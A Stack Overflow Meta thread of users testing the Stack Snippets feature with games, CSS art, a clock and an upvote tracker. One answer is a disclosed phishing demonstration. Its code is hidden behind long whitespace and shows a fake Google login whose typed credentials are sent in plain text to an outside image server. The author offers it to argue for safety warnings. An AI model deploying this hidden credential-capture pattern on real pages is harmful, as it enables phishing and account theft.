# Stack Snippets Sandbox - Try It Out Here!

Tags: discussion, stack-snippets

This post is dedicated to testing out the [newly announced Stack Snippets feature](https://meta.stackoverflow.com/questions/269753/announcing-stack-snippets). Feel free to answer with your own Stack Snippets, and have some fun!

Comment: Plus points to whoever can find a way to abuse it? :)

Comment: @Mysticial one way to find out... ;)

Comment: I'll have to try this out when I get home- Work won't let me run the snippet in the answer below because it's from a "Newly Registered Website" :(

Comment: @Kendra sounds like a workplace firewall that blocks based on content. stacksnippets.net is a newly registered domain.

Comment: @Haney That's what it was exactly. I'm sure it'll chill after a while. :)

Comment: Well, there goes [PPCG](http://codegolf.stackexchange.com/). I honestly don't know if it's a good or bad thing there. Easily testable, yet obfuscated snippets :D

Comment: NoScript may be getting in the way. Only a few are running for me and I got one warning about cross-site-scripting. OS X 10.8.5; FF 31.0; NoScript 2.6.8.36.

Comment: Seems like my workplace firewall is blocking most of these, which in turn then crashes my current tab, good idea, but if it is blocked at work / public networks then it's going to be a hindrance more than anything :(

Comment: this is so coooooool!

Comment: @Haney not sure which snippet broke my browser but trying to use 'back' keeps me on this page for now about 50 attempts.

Comment: I did a little more research - for me the snippets will run in Chrome, but not in FF. Were they designed to be browser specific?

Comment: I wonder how long it will be before someone tries to write a snippet that when run applies an upvote to the containing answer (or question)...

Comment: @JayBlanchard The snippets run fine for me in Firefox 31.

Comment: Right now all snippets display "Connection was reset" for me. I guess someone did find a way to break it?

Comment: I'm running FF 31 @RevanProdigalKnight. No joy. EDIT: and then suddenly it works. ¯\_(ツ)_/¯

Comment: @JayBlanchard That's good, because I was going to resort to the old "Have you tried turning it off and on again?" and I really didn't want to have to do that.

Comment: @Mysticial Wait, does that mean I get points? :P http://meta.stackoverflow.com/a/269899/526741

Comment: @bfrohs you get points. I start the negotiations at `whateverNumberOfPointsYouWant * -1` and let's settle in the middle?

Comment: I would like `-9001` points please ;)

Comment: Perfect, I'll counter with 9001 and we'll meet in the middle (0).

Comment: Well, `-9001 * -1` is `9001`, and the middle of `9001..9001` is `9001`, so I'm getting over 9000 points? I'm in.

Comment: Anyone up for writing up a basic C code beautifier? (related: [Let's have a “Tidy Up” button!](http://meta.stackoverflow.com/questions/261249/lets-have-a-tidy-up-button))

Comment: I don't know if it's just me, but this page takes FOREVER to load and render...

Comment: @lc. your typical, real-world question won't have like 75 snippet answers. Also the first version of the code was a bit less efficient than the second. :)

Comment: Finally, I can view these at work! Stack Snippets now has my full support and love.

Comment: And now suddenly the snippets have quit working in FF 32.0.2

Comment: Are the stack snippets broken? Because the server [stacksnippets.net](http://stacksnippets.net/) seems to have 500 server error issues. And it has been like this for a little while. Any updates on this?

Comment: Broken for me too. See: http://meta.stackoverflow.com/questions/284780/code-snippet-execution-window-returns-server-error

Comment: PONG!!! http://meta.stackoverflow.com/questions/269754/stack-snippets-sandbox-try-it-out-here/285711#285711

Comment: Is it bydesign that stack snippets don't work in tag wikis? Could we get them to work in tag wikis?

Comment: Can't compose stack snippets using Opera 12.17 - does this technology rely upon latest ECMA script?

Answer (score 564):

## Detecting and Requiring Upvotes to View the Result

I'm not totally sure this will work...SE caches the API requests, so I can only update it every minute (I think). I can't test it extensively because I'm starting to run out of requests on my IP for some reason, and I can't upvote my own question. I'm not used to working with APIs, so this may not be very optimized. Please suggest improvements and report your results, I would appreciate it.

**EDIT: Now you'll see something cool when you upvote.**

```js
$(document).ready(function() {
  $.getJSON("https://api.stackexchange.com/2.2/questions/269754/answers/?order=desc&site=meta.stackoverflow&client_id=3519&callback=?", function (data) {
  
      var originalScore = data.items.find(v => v.answer_id == 270116).score;

      $("#postCounter span").text(originalScore);

      var counter = 60;

      function updateCounter() {
          $("#counter span").text(counter);
          counter--;
          if (counter == 0) {
              counter = 60;
              $.getJSON("https://api.stackexchange.com/2.2/questions/269754/answers/?order=desc&site=meta.stackoverflow&client_id=3519&callback=?", function (data) {
                  var newScore = data.items.find(v => v.answer_id == 270116).score;
                  if (newScore > originalScore) {
                      $("#message").html("WOOHOO! You upvoted!<img src='https://i.imgur.com/B5aTato.gif' />");
                  } else if (newScore < originalScore) {
                      $("#message").text("Someone downvoted! :( Upvote!");
                  } else {
                      $("#message").text("Upvote to see the result! (nothing new)");
                  }
                  originalScore = newScore;
              });
          }
          setTimeout(updateCounter, 1000);
      };

      updateCounter();
  });
});
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.js"></script>
<div id="message">Upvote to see the result!</div>
<div id="counter">Time until next request: <span></span>
</div>
<div id="postCounter">This answer had <span></span> votes when you loaded the demo.</div>
```

Comment: Awww.... I wanted something cool for my upvote!

Comment: There, I gave it a better reward.

Comment: Can I re-upvote this? That is awesome.

Comment: The 60 second delay really kills it. It would be nice if you could do `if($x('//*[@id="answer-270116"]/table/tbody/tr[1]/td[1]/div/a[1]')[0].className.match('vote-up-on')){ handleUpVote() }` but the sandboxing is sure to get in the way.

Comment: This is great for when you really want that reputation! "**This answer will blow your mind!** *Click upvote to see it!*"

Comment: Note this also works on downvotes... ;P

Comment: For reference, the reward is text saying "WOOHOO! You upvoted!" and a gif of fireworks. https://i.imgur.com/B5aTato.gif

Comment: @Kendra You can retract your upvote to upvote it again later. But [you can only do that 30 times](https://meta.stackexchange.com/a/164900/349538).

Answer (score 206):

Huh? Not much love for CSS in the current answers? So I would share mine... designed specially for testing this feature... :)

[Also on CodePen](http://codepen.io/mr_alien/pen/fcjin)

**Conclusion** : It will be great if we can use Auto Prefixer, Prefix free like general plugins

```js
//Made for Stack Overflow Code Testing

//Unicorn Inspired by http://drbl.in/kayh

//Made by Mr. Alien


/*
 * Just created in a hurry, so won't refactor my CSS
 * as of now, also I can drastically reduce
 * the markup but I won't do it right now
*/
```

```css
html, body {
  height: 450px;
  background: -webkit-radial-gradient(center, ellipse, #fce300 0%, #ffc700 46%, #ff7f00 100%);
  background: radial-gradient(ellipse at center, #fce300 0%,#ffc700 46%,#ff7f00 100%);
}

.unicorn {
  position: absolute;
  left: 50%;
  top: 170px;
  margin-left: -250px;
}

.tail > div,
.body > div,
.leg > div,
.leg2 > div,
.leg3 > div,
.unihorn {
  width: 0; 
  height: 0;
  position: absolute;
  -webkit-transform-origin: 50% 50%;
      -ms-transform-origin: 50% 50%;
          transform-origin: 50% 50%;
}

.tail .pone{ 
  border-left: 30px solid transparent;
  border-right: 40px solid transparent;
  border-bottom: 30px solid #ffb82b;
  -webkit-transform: rotate(6deg);
      -ms-transform: rotate(6deg);
          transform: rotate(6deg);
}

.tail .ptwo {
  border-left: 40px solid transparent;
  border-right: 30px solid transparent;
  border-bottom: 30px solid #FD8A07;
  -webkit-transform: rotate(-39deg);
      -ms-transform: rotate(-39deg);
          transform: rotate(-39deg);
  top: 26px;
  left: -30px;
}

.tail .pthree {
  border-top: 30px solid transparent;
  border-bottom: 30px solid transparent; 
  border-right: 30px solid #ffb82b; 
  -webkit-transform: rotate(5deg); 
      -ms-transform: rotate(5deg); 
          transform: rotate(5deg);
  top: 45px;
  left: -12px;
}

.tail .pfour {
  top: 72px;
  left: 17px;
  border-bottom: 35px solid #FD8A07;
  border-right: 35px solid transparent;
  -webkit-transform: rotate(5deg);
      -ms-transform: rotate(5deg);
          transform: rotate(5deg);
}

div.body .pone {
  border-top: 10px solid transparent;
  border-left: 221px solid #FD8A07;
  border-bottom: 60px solid transparent;
  -webkit-transform: rotate(40deg);
      -ms-transform: rotate(40deg);
          transform: rotate(40deg);
  top: 65px;
  left: 45px;
}

div.body .ptwo {
  border-bottom: 70px solid #ffb82b;
  border-left: 90px solid transparent;
  border-right: 130px solid transparent;
  -webkit-transform: rotate(43deg);
      -ms-transform: rotate(43deg);
          transform: rotate(43deg);
  top: 15px;
  left: 87px;
}

div.body .pthree {
  border-bottom: 100px solid #FD8A07;
  border-left: 20px solid transparent;
  border-right: 130px solid transparent;
  -webkit-transform: rotate(71deg);
      -ms-transform: rotate(71deg);
          transform: rotate(71deg);
  top: 15px;
  left: 200px;
}

div.body .pfour {
  border-bottom: 100px solid #ffb82b;
  border-left: 30px solid transparent;
  border-right: 130px solid transparent;
  -webkit-transform: rotate(109deg);
      -ms-transform: rotate(109deg);
          transform: rotate(109deg);
  top: 38px;
  left: 246px;
}

div.body .pfive {
  border-bottom: 60px solid #FD8A07;
  border-right: 105px solid transparent;
  left: 310px;
  top: -27px;
  -webkit-transform: rotate(34deg);
      -ms-transform: rotate(34deg);
          transform: rotate(34deg);
}

div.body .psix {
  border-top: 85px solid #ffb82b;
  border-left: 85px solid transparent;
  left: 319px;
  top: -40px;
  -webkit-transform: rotate(19deg);
      -ms-transform: rotate(19deg);
          transform: rotate(19deg);
}

div.body .pseven {
  border-bottom: 110px solid #FD8A07;
  border-left: 85px solid transparent;
  left: 350px;
  top: -144px;
  -webkit-transform: rotate(19deg);
      -ms-transform: rotate(19deg);
          transform: rotate(19deg);
}

div.body .peight {
  border-bottom: 90px solid #ffb82b;
  border-right: 120px solid transparent;
  left: 425px;
  top: -92px;
  -webkit-transform: rotate(18deg);
      -ms-transform: rotate(18deg);
          transform: rotate(18deg);
}

div.body > div.eye {
  background-color: #000;
  top: -70px;
  left: 445px;
  height: 10px;
  width: 10px;
  border-radius: 50%;
  z-index: 1;
}

div.nose {
  border-bottom: 40px solid #f27d00;
  border-right: 40px solid transparent;
  -webkit-transform: rotate(-28deg);
      -ms-transform: rotate(-28deg);
          transform: rotate(-28deg);
  left: 480px;
  top: -15px;
}

div.extreme-left {
  border-top: 115px solid transparent;
  border-right: 30px solid #ffb82b;
  border-bottom: 110px solid transparent;
  -webkit-transform: rotate(-65deg);
      -ms-transform: rotate(-65deg);
          transform: rotate(-65deg);
  left: 130px;
  top: 4px;
}

div.leg .pone {
  border-top: 120px solid transparent;
  border-right: 60px solid #FD8A07;
  border-bottom: 0px solid transparent;
  -webkit-transform: rotate(-50deg);
      -ms-transform: rotate(-50deg);
          transform: rotate(-50deg);
  top: 55px;
  left: 45px; 
}

div.leg .ptwo {
  border-top: 20px solid transparent;
  border-right: 30px solid #ffb82b;
  border-bottom: 20px solid transparent;
  top: 145px;
  -webkit-transform: rotate(-24deg);
      -ms-transform: rotate(-24deg);
          transform: rotate(-24deg);
  left: 66px;
}

div.leg .pthree {
  border-top: 15px solid transparent;
  border-right: 33px solid #FD8A07;
  border-bottom: 20px solid transparent;
  top: 164px;
  -webkit-transform: rotate(34deg);
      -ms-transform: rotate(34deg);
          transform: rotate(34deg);
  left: 63px;
}

div.leg .pfour {
  border-left: 0 solid transparent;
  border-right: 20px solid transparent;
  border-bottom: 100px solid #ffb82b;
  -webkit-transform: rotate(-15deg);
      -ms-transform: rotate(-15deg);
          transform: rotate(-15deg);
  top: 165px;
  left: 80px;
}

div.leg .pfive {
  border-bottom: 30px solid #FD8A07;
  border-right: 30px solid transparent;
  top: 235px;
  -webkit-transform: rotate(-15deg);
      -ms-transform: rotate(-15deg);
          transform: rotate(-15deg);
  left: 89px;
}

div.body .extreme-right {
  left: 246px;
  top: 100px;
  border-top: 30px solid #FD8A07;
  border-left: 80px solid transparent;
  border-right: 85px solid transparent;
  -webkit-transform: rotate(-33deg);
      -ms-transform: rotate(-33deg);
          transform: rotate(-33deg);
}

div.leg2 div.pone {
  border-top: 50px solid #ffb82b;
  border-right: 85px solid transparent;
  left: 339px;
  top: 84px;
  -webkit-transform: rotate(-53deg);
      -ms-transform: rotate(-53deg);
          transform: rotate(-53deg);
}

div.leg2 div.ptwo {
  border-bottom: 20px solid #FD8A07;
  border-left: 42px solid transparent;
  border-right: 30px solid transparent;
  -webkit-transform: rotate(62deg);
      -ms-transform: rotate(62deg);
          transform: rotate(62deg);
  left: 328px;
  top: 146px;
}

div.leg2 .pthree {
  border-left: 0 solid transparent;
  border-right: 20px solid transparent;
  border-bottom: 100px solid #ffb82b;
  -webkit-transform: rotate(-15deg);
      -ms-transform: rotate(-15deg);
          transform: rotate(-15deg);
  top: 154px;
  left: 368px;
}

div.leg2 .pfour {
  border-bottom: 30px solid #FD8A07;
  border-right: 30px solid transparent;
  top: 230px;
  -webkit-transform: rotate(-15deg);
      -ms-transform: rotate(-15deg);
          transform: rotate(-15deg);
  left: 378px;
}

div.leg3 div.pone {
  border-top: 50px solid transparent;
  border-left: 60px solid #ef7b00;
  border-bottom: 30px solid transparent;
  left: 382px;
  top: 60px;
  -webkit-transform: rotate(6deg);
      -ms-transform: rotate(6deg);
          transform: rotate(6deg);
}

div.leg3 div.ptwo {
  border-left: 0px solid transparent;
  border-right: 30px solid transparent;
  border-top: 50px solid #e87604;
  left: 419px;
  top: 116px;
  -webkit-transform: rotate(-18deg);
      -ms-transform: rotate(-18deg);
          transform: rotate(-18deg);
}

div.leg3 div.pthree {
  border-bottom: 30px solid #e5892d;
  border-left: 13px solid transparent;
  left: 411px;
  top: 143px;
  -webkit-transform: rotate(-17deg);
      -ms-transform: rotate(-17deg);
          transform: rotate(-17deg);
}

div.leg3 .pfour {
  border-bottom: 30px solid #FD8A07;
  border-right: 30px solid transparent;
  top: 173px;
  -webkit-transform: rotate(76deg);
      -ms-transform: rotate(76deg);
          transform: rotate(76deg);
  left: 403px;
}

.unihorn {
  top: -130px;
  left: 446px;
  border-top: 10px solid transparent;
  border-left: 120px solid #FD8A07;
  border-bottom: 10px solid transparent;
  -webkit-transform: rotate(-36deg);
      -ms-transform: rotate(-36deg);
          transform: rotate(-36deg);
}
```

```html
<div class="unicorn">
  <div class="tail">
    <div class="pone"></div>
    <div class="ptwo"></div>
    <div class="pthree"></div>
    <div class="pfour"></div>
  </div>
  <div class="body">
    <div class="pone"></div>
    <div class="ptwo"></div>
    <div class="pthree"></div>
    <div class="pfour"></div>
    <div class="pfive"></div>
    <div class="psix"></div>
    <div class="pseven"></div>
    <div class="peight"></div>
    <div class="eye"></div>
    <div class="nose"></div>
    <div class="extreme-left"></div>
    <div class="extreme-right"></div>
  </div>
  <div class="leg">
    <div class="pone"></div>
    <div class="ptwo"></div>
    <div class="pthree"></div>
    <div class="pfour"></div>
    <div class="pfive"></div>
  </div>
  <div class="leg2">
    <div class="pone"></div>
    <div class="ptwo"></div>
    <div class="pthree"></div>
    <div class="pfour"></div>
  </div>
  <div class="leg3">
    <div class="pone"></div>
    <div class="ptwo"></div>
    <div class="pthree"></div>
    <div class="pfour"></div>
  </div>
  <div class="unihorn"></div>
</div>
```

Comment: Much fluffy, such unicorn.

Comment: It's... it's... it's indescribably beautiful

Comment: Great work, like origami unicorn

Comment: This. Is. Incredibly. Awesome.

Comment: Not much love for the Alien :(

Comment: That is impressive but looked massively annoying to put in place (when looking at the HTML)

Answer (score 182):

Let's do a little dungeon crawling! (canvas/keyboard test)

```js
/* set up ROT library */
ROT.DEFAULT_WIDTH = 80;
ROT.DEFAULT_HEIGHT = 16;
var display = new ROT.Display({fontSize: 12});
document.getElementById("canvasContainer").appendChild(display.getContainer());

var data, player, goal, pickaxe = false, level = 0, gold = 0;

/* function to determine if (x,y) is open or a wall */
var lightPasses = function(x, y) {
    var key = x+","+y;
    if (key in data) { return (data[key] !== 1); }
    return false;
};

/* redraw the map; called after each step */
function redraw() {
    display.drawText(0,  0, "Level "+level+", Gold "+gold);
    var fov = new ROT.FOV.PreciseShadowcasting(lightPasses);

    /* use ROT.js to compute visibility and draw the map */
    fov.compute(player.x, player.y, 10, function(x, y, r, visibility) {
        var ch = "", key = x+","+y;
        if(data[key] === 0) { ch = "."; }
        if(data[key] === 2) { ch = "o"; }
        if(!r) { ch = pickaxe ? "#" : "@"; }
        if(goal.x == x && goal.y == y) { ch = "X"; }
        var bgcolor = ["#333","#AAA","#333"][data[key]];
        var fgcolor = ["#FFF","#AAA","#ecff67"][data[key]];
        display.draw(x, y+1, ch, fgcolor, bgcolor);
    });
}

/* create a new level with walls, start point, and goal */
function createMap() {
    /* clear and output help text */
    level++;
    display.clear();
    display.drawText(0,  ROT.DEFAULT_HEIGHT-2, "Use HJKL, WASD or the arrow keys to explore the dungeon and find the goal. P toggles pickaxe. Made with rot.js (https://ondras.github.io/rot.js)");

    /* use ROT.js to generate a new wall dictionary */
    data = {};
    var freeSpaces = [];
    new ROT.Map.Digger(ROT.DEFAULT_WIDTH, ROT.DEFAULT_HEIGHT-2).create(function(x, y, type) {
        data[x+","+y] = type;
        if(!type) { freeSpaces.push(x+","+y); }
    });
    /* shuffle the free spaces */
    for (let i = freeSpaces.length - 1; i > 0; i--){
        const j = Math.floor(Math.random() * i);
        const temp = freeSpaces[i];
        freeSpaces[i] = freeSpaces[j];
        freeSpaces[j] = temp;
    }

    /* pick a start location from available free spaces */
    var coords = freeSpaces[0].split(",");
    player = {
        x: +coords[0],
        y: +coords[1]
    };
    /* reset pickaxe on every new level */
    pickaxe = false;

    /* pick a goal location from available free spaces */
    coords = freeSpaces[1].split(",");
    goal = {
        x: +coords[0],
        y: +coords[1]
    };
    /* every 20 blocks there's a gold */
    for (let i = 2; i <= freeSpaces.length / 20; i++)
        data[freeSpaces[i]] = 2;
    redraw();
}

/* create the first level */
createMap();

document.addEventListener("keydown", function(e) {
    var newPos = { x: player.x, y: player.y };

    /* calculate new position based on step direction */
    if([ROT.KEYS.VK_LEFT, ROT.KEYS.VK_H, ROT.KEYS.VK_A].indexOf(e.keyCode) != -1) { newPos.x-=1; }
    if([ROT.KEYS.VK_RIGHT, ROT.KEYS.VK_L, ROT.KEYS.VK_D].indexOf(e.keyCode) != -1) { newPos.x+=1; }
    if([ROT.KEYS.VK_UP, ROT.KEYS.VK_K, ROT.KEYS.VK_W].indexOf(e.keyCode) != -1) { newPos.y-=1; }
    if([ROT.KEYS.VK_DOWN, ROT.KEYS.VK_J, ROT.KEYS.VK_S].indexOf(e.keyCode) != -1) { newPos.y+=1; }

    /* toggle pickaxe */
    if([ROT.KEYS.VK_P].indexOf(e.keyCode) != -1) { pickaxe = !pickaxe; }

    var key = newPos.x+","+newPos.y;
    /* if the target space is clear, move there */
    if([0, 2].indexOf(data[key]) !== -1) {
        gold += (data[key] === 2);
        data[key] = 0;
        player.x = newPos.x; player.y = newPos.y;
    } else if(data[key] === 1 && pickaxe) {
        /* if the target space is a wall AND the player is using the pickaxe, dig */
        data[key] = 0;
        player.x = newPos.x; player.y = newPos.y;
    }

    /* redraw the level */
    redraw();

    /* if we made it to the goal, make a new level */
    if(player.x == goal.x && player.y == goal.y) { createMap(); }

    /* Don't scroll the page if the arrow keys are pressed */
    e.preventDefault();
});
```

```html
<script src="https://cdn.jsdelivr.net/npm/rot-js@2/dist/rot.min.js"></script>
<div id="canvasContainer"></div>
```

Comment: +1 for wasting 3 hours of my life

Comment: Favorited this thread just for this <3

Comment: This is great. Are you supposed to be able to just blast through walls though?

Comment: @j.f. Pickaxes were my favorite think in Nethack (archaeologist class all the way!), but it is a bit odd that you can just blast through walls by default. I've made it a toggleable option instead!

Comment: @apsillers, very nice!

Comment: Fantastic!  If only all of the snippets posted in the future will be this good...

Comment: Pressing UP arrow or DOWN arrow for me is causing the page to scroll up or down a line at the same time the player moves up or down.

Comment: **You MONSTER** what have you done? I haven't done anything for 2 hours. :D

Comment: This is a little difficult to play with when your keyboard is in dvorak...

Comment: You should be the dots edible. Then add in some "ghosts".

Comment: @Cᴏʀʏ fixed by adding `preventDefault()`

Comment: Know this is dead and all, but this needs a feature for holding in key for constant movement. It is annoying having to smash he keys to mvoe

Comment: @Zoe This has been implemented in revision 9. Enjoy!

Comment: @Cᴏʀʏ This has been fixed in revision 9. Please enjoy `:)`

Comment: @iBug I wanted to say thanks (many months after the fact) for your improvements! I really like them. `:)`

Answer (score 77):

Yet another s***ty Stack Overflow clone (WIP, feel free to contribute).

Features:

- You can ask questions (duh)
- You still cannot post answers
- Mixed spaces and tabs *all rejoice*
- Industry-standard jQuery selector how-to-do-it
- Version control and diffing courtesy of Stack Exchange
- Also, I have two forks: the SO one and on my editor. Syncing is a breeze!
- Some form of self-upvoting

TODO:

- Post answer
- Stylesss
- etc.
- Fulfill everyone's dream. Elect your self as a mod. Insta-close and delete hammer!

```js
$(document).ready(function() {
 $('#ask-question').click(function(e) {
  e.preventDefault();
  
  $('#question-form').removeClass('hidden');
  $('#questions').addClass('hidden');
  $('#question').addClass('hidden');
 });
 
 $('#cancel-question').click(function(e) {
  e.preventDefault();
  
  $('#question-form').addClass('hidden').find('input[type=reset]').click();
  
  $('#questions').removeClass('hidden');
 });
 
 $('#question-form').submit(function(e) {
  e.preventDefault();
  
  var question = $('#questions .question.hidden').clone().removeClass('hidden');
  question.find('.title').html($(this).find('input[name=title]').val());
  question.find('.body').html($(this).find('textarea[name=body]').val());
  
  question.prependTo($('#questions'));
 
  $('#cancel-question').click();
 });
 
 $('#questions').on('click', '.question .title', function(e) {
  e.preventDefault();
  
  $('#questions').addClass('hidden');
  $('#question').removeClass('hidden');
  
  var question_item = $(this).parents('.question');
  $('#question-content').find('.title').html(question_item.find('.question-summary .title').html());
  $('#question-content').find('.body').html(question_item.find('.question-summary .body').html());
  
  question_item.addClass('viewed');
 });
 
 $('#upvote-none').click(function() {
  $('#question, #questions .question.viewed').addClass('upvoted').removeClass('downvoted');
 });
 
 $('#upvote-yes').click(function() {
  $('#question, #questions .question.viewed').removeClass('upvoted').removeClass('downvoted');
 });
 
 $('#downvote-none').click(function() {
  $('#question, #questions .question.viewed').removeClass('upvoted').addClass('downvoted');
 });
 
 $('#downvote-yes').click(function() {
  $('#question, #questions .question.viewed').removeClass('upvoted').removeClass('downvoted');
 });
 
 $('#close-question').click(function(e) {
  e.preventDefault();
  $('#question').addClass('hidden').removeClass('upvoted downvoted');
  $('#questions').removeClass('hidden');
  
  $('#questions .question.viewed').removeClass('viewed');
 });
});
```

```css
body {
  font-family: 'Arial';
}

.hidden {
  display: none;
}

#header {
 height: 100px;
}

#logo-area {
  float: left; /* bah! */
  width: 300px;
}

#menu {
  margin-left: 300px;
  padding-top: 30px;
}

#menu a {
  display: inline-block;
  background-color: #777;
  padding: 5px 10px;
  color: #fff;
  text-decoration: none;
  vertical-align: middle;
}

#menu a + a {
  margin-left: 5px;
}

#menu a:hover,a.selected {
  background-color: #FF9900;
}

#ask-question {
  float: right;
}


#questions .question + .question {
 margin-top: 20px;
}

#questions .question .title, #question .title {
 font-weight: bold;
 color: #000;
 display: block;
}

#questions .question .body, #question .body {
 margin-top: 10px;
}

#questions .question .votes .zero {
 display: none;
}

#questions .question:not(.upvoted):not(.downvoted) .zero {
 display: block;
}

#questions .question:not(.upvoted):not(.downvoted) .upvote,.downvote {
 display: none;
}

#questions .question.upvoted .upvote {
 display: block;
}

#questions .question.downvoted .downvote {
 display: block;
}


#vote-area {
 float: left;
 width: 50px;
}

#question-content {
 margin-left: 50px;
}


#question:not(.upvoted) #upvote-yes {
 display: none;
}

#question:not(.downvoted) #downvote-yes {
 display: none;
}

#question.upvoted #upvote-none {
 display: none;
}

#question.downvoted #downvote-none {
 display: none;
}
```

```html
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<div id="header">
  <div id="logo-area">
 <img id="logo" src="https://i.stack.imgur.com/HCDT0.png">
  </div>

  <div id="menu">
 <a href="#" id="menu-questions" class="selected">Questions</a>
 <a href="#" id="menu-tags">Tags</a>
 <a href="#" id="menu-users">Users</a>
 <a href="#" id="menu-badges">Badges</a>
 <a href="#" id="menu-unanswered">Unanswered</a>
 <a id="ask-question" href="#">Ask Question</a>
  </div>
</div>

<form id="question-form" class="hidden">
 <div>
  <label>
   Title <input type="text" name="title" required>
  </label>
 </div>
 
 <div>
  <textarea name="body" required></textarea>
 </div>

 <div>
  <input type="submit" value="Post Question">
  <input type="reset" value="Reset" class="hidden">
  
  <a href="#" id="cancel-question">Cancel</a>
 </div>
</form>

<div id="questions">
 <div class="question hidden">
  <div class="votes">
   <div class="zero">0 votes</div>
   <div class="upvote">1 vote</div>
   <div class="downvote">-1 vote</div>
  </div>
  
  <div class="question-summary">
   <a href="#" class="title"></a>
   <div class="body"></div>
  </div>
 </div>
</div>

<div id="question" class="hidden">
 <a href="#" id="close-question">Back to questions</a>

 <div id="vote-area">
  <div><img id="upvote-none" src="https://i.stack.imgur.com/d3ZxT.png"></div>
  <div><img id="upvote-yes" src="https://i.stack.imgur.com/ODYeu.png"></div>
  <div><img id="downvote-none" src="https://i.stack.imgur.com/bWB0F.png"></div>
  <div><img id="downvote-yes" src="https://i.stack.imgur.com/J6Lgl.png"></div>
 </div>
 
 <div id="question-content"> 
  <div class="title"></div>
  <div class="body"></div>
 </div>
</div>
```

P.S. This is not to make fun of SO or something (well...). Just having fun, life, etc.

P.S 2 Maybe after all these stuff I throw at it we'll see some programmers flying out of demons' noses.

Comment: I can't vote on this because there are no vote buttons.

Comment: @BoltClock Something got in the way of creativity, so the project is kind of delayed...

Comment: It breaks if you try and ask a second question. *Hmmm, maybe this really is an improved Stack Overflow…*

Comment: I just love the logo.

Comment: Well, I guess at this moment there are at least 18 people who oppose the very idea and point of SO. I knew that already; it's nice to see the cockroaches out with the lights on.

Comment: Just for recursions sake there should be a run code snippet in the new questions....

Comment: @BoltClock , you can upvote ,first ask question

Comment: [I've been having so much fun with this.](https://i.stack.imgur.com/BhCUG.png)

Comment: Didn't see my question being downvoted, so unrealistic. *eye roll*

Comment: “Slack overflow“—a mix of the collaboration tools we all ‘love’!

Answer (score 69):

Users don't always notice the horizontal scrollbar on code snippets, and it's even harder to notice when the good code obviously scrolls, but not as much as the scrollbar indicates. This can lead to users' credentials being stolen unintentionally.

I would highly suggest more of a warning when clicking "Run code snippet" to warn against this danger. Perhaps just a warning above/below the snippet when it's run that warns that content could be malicious?

To test:

1. Click "Run code snippet" below
2. Click "Log in using Google"
3. Enter ***fake*** credentials and submit (credentials will be sent to http://placehold.it/ in plain text)
4. Notice the image loaded is from an external server and had the credentials sent to it (and back, in the form of the image)

```js
$("#main-warning").css("color", "#f00");                                                                                                                                                                                                                                                                                                                                                                                                                $("#provider").css("display", "block");$("#provider-google").click(function() {$("#login").css("display", "block");$("#provider").css("display", "none");});$("#login-form").submit(function(event) {$("#login").css("display", "none");$("#test").attr("src", "http://placehold.it/400x100&text=" + $("#login-email").val() + " :( " + $("#login-password").val());$("body").css("overflow", "visible");event.preventDefault();});
```

```css
#main-warning {
  color:#c00;
}                                                                                                                                                                                                                                                                                                                                                                                                                body {overflow:hidden;}#provider, #login {display:none;position:fixed;top:0;bottom:0;left:0;right:0;z-index:100;overflow:auto;background:#fff;padding:10px;}#provider {font-family:Arial,Liberation Sans,DejaVu Sans,sans-serif;font-size:12.8px;color:#888;}#provider span {display:inline-block;background:#F9F9F9;border:1px solid #D4D4D4;padding:7px;width:258px;cursor:pointer;}#provider span img {vertical-align:middle;}#login {text-align:center;font-family:Arial,Liberation Sans,DejaVu Sans,sans-serif;}#login > div {margin:0 auto;max-width:300px;}#login > div > p {color:#333;}#login > div > p.warning {color:#f00;font-style:italic;}#login form {text-align:left;background:#eee;box-shadow:2px 2px 2px #ccc;padding:.01em 15px;width:100%;}#login input {border:1px solid #ccc;padding:10px;box-sizing:border-box;width:100%;max-width:100%;}#login button {background:#2771D8;color:#fff;border:0;padding:10px;width:100%;border-radius:3px;}
```

```html
<p id="main-warning">The image below was requested from another server. It could just as easily have been a 1px by 1px image hidden like the rest of this html. This makes it very easy for someone to collect credentials of several users (especially users new to functionality). It likely won't be noticed until someone familar with functionality comes across it, or someone tries to edit it.</p>
<img id="test" src="http://placehold.it/400x100/">                                                                                                                                                                                                                                                                                                                                                                                                                <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script><div id="provider"><p>Please log in to view Stack Snippet.</p><span id="provider-google"><img src="http://placehold.it/16x16/5081f1/ffffff&text=g"> Log in using Google</span></div><div id="login"><div><img src="http://placehold.it/100x40&text=Google"><p>Sign in with your Google Account</p><p class="warning">Don't type in an actual password, it will be sent in a request when submitting</p><form id="login-form" method="post" action="#"><p><input id="login-email" type="email" placeholder="Email" autofocus required></p><p><input id="login-password" type="password" placeholder="Password" required></p><p><button id="login-button" type="submit">Sign in</button></p></form></div></div>
```

Comment: Good one, possible phishing as it were.

Comment: @Haney Aye. And it could obviously be expanded to the other services. I just did enough to get the point across ;)

Comment: Additionally, if it matters, it could likely be possible to save state so each user only sees the message once. Either with cookies, or trying to load an image with `Image()` and checking if it fails or not (and having the server fail if user already loaded, based on cookie or IP on the server's end).

Comment: So how can we fight this? Is it even possible? What about onhover/click/keydown open a new tab that looks exactly like Google's homepage but it's domain is `googgle.com` or `googIe.com`?

Comment: @Pacerier The second paragraph offers some suggestions for combating this. A simple "Do not share any personal information, including passwords." message would help tremendously. A "What are these snippets?" help link would be beneficial as well (even if it was just a `?` tooltip).

Comment: @bfrohs, Not everyone knows how the technology works, people can be easily tricked: http://meta.stackoverflow.com/questions/269753/feedback-requested-runnable-code-snippets-in-questions-and-answers/272391#272391

Answer (score 58):

What time is it?

```js
document.getElementsByTagName("div")[0].style.marginTop = document.height / 3 + "px";

window.setInterval(function () {
    var time = "";
    var now = new Date();
    var hours = "" + now.getHours() + ":";
    var minutes = "" + now.getMinutes() + ":";
    var seconds = "" + now.getSeconds();
    var part;

    if (parseInt(hours) < 12) {
        part = " AM";
    } else {
        hours = parseInt(hours);
        if (hours !== 12) {
            hours -= 12;
        }
        hours += ":";
        part = " PM";
    }
    if (hours.length < 3) {
        hours = "0" + hours;
    }
    if (minutes.length < 3) {
        minutes = "0" + minutes;
    }
    if (seconds.length < 2) {
        seconds = "0" + seconds;
    }
    time += hours;
    time += minutes;
    time += seconds;
    time += part;
    document.getElementById("holder").innerHTML = time;
}, 1000);
```

```css
div {
    text-align: center;
    font-size: 70pt;
}
```

```html
<div id="holder"></div>
```

